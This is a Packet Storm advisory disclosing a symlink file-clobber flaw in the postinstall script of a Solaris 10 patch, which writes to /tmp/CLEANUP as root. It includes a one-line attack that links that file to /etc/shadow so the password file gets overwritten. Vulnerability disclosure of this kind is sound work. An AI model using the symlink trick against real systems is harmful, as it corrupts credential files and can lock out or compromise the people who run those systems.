Solaris 10 Patch Cluster File Clobber

2013-06-19T00:00:00
ID PACKETSTORM:122077
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2013-06-19T00:00:00

Description

                                        
                                            `File clobbering vulnerability in Solaris 10 patch cluster  
3/27/2013  
Larry W. Cashdollar  
@_larry0  
  
Hello,  
  
The 147147-26 patch creates a CLEANUP file in /tmp that is vulnerable to symlink attacks:  
  
The contents of the file created in /tmp are:  
  
/sbin/sh:root@dev-unix-sec02# cat CLEANUP  
  
EXISTING_FILE_PRESERVED: /var/run/.patchSafeMode/root/etc/security/audit_event /var/run/.patchSafeMode/root/etc/security/audit_event.new  
  
EXISTING_FILE_RENAMED: /var/run/.patchSafeMode/root/etc/mail/sendmail.cf /var/run/.patchSafeMode/root/etc/mail/sendmail.cf.old EXISTING_FILE_RENAMED: /var/run/.patchSafeMode/root/etc/mail/submit.cf /var/run/.patchSafeMode/root/etc/mail/submit.cf.old  
  
Sendmail has been upgraded to version 8.14.5 . After you reboot, you may want to run  
  
/usr/sbin/check-hostname  
and  
  
/usr/sbin/check-permissions ALL  
  
These two shell-scripts will check for common mis-configurations and recommend corrective action, or report if things are OK.  
  
-rw-r--r-- 1 root other 662 Mar 27 13:03 CLEANUP  
  
The vulnerable code can be found in ./SUNWsndmu/install/postinstall:  
  
540 CLEANUP=/tmp/CLEANUP  
541  
542 if [ "x$UPDATE" = xyes ]; then  
  
543 VERSION=`grep '^DZ' $PKG_INSTALL_ROOT/etc/mail/sendmail.cf | \  
544 sed -e s/DZ//`  
545 echo "\nSendmail has been upgraded to version $VERSION ." >>$CLE  
ANUP  
546 echo "After you reboot, you may want to run" >>$CLEANUP  
547 echo "\t/usr/sbin/check-hostname" >>$CLEANUP  
548 echo "and" >>$CLEANUP  
549 echo "\t/usr/sbin/check-permissions ALL" >>$CLEANUP  
550 echo "These two shell-scripts will check for common" >>$CLEANUP  
551 echo "misconfigurations and recommend corrective" >>$CLEANUP  
552 echo "action, or report if things are OK.\n" >>$CLEANUP  
  
553 fi  
  
A simple attack in /tmp can clobber /etc/shadow:  
  
[/tmp $] ln -s /etc/shadow CLEANUP  
  
Will over write the contents of /etc/shadow.  
  
Oracle has been notified 3/27/2013 and they are working on a fix.  
`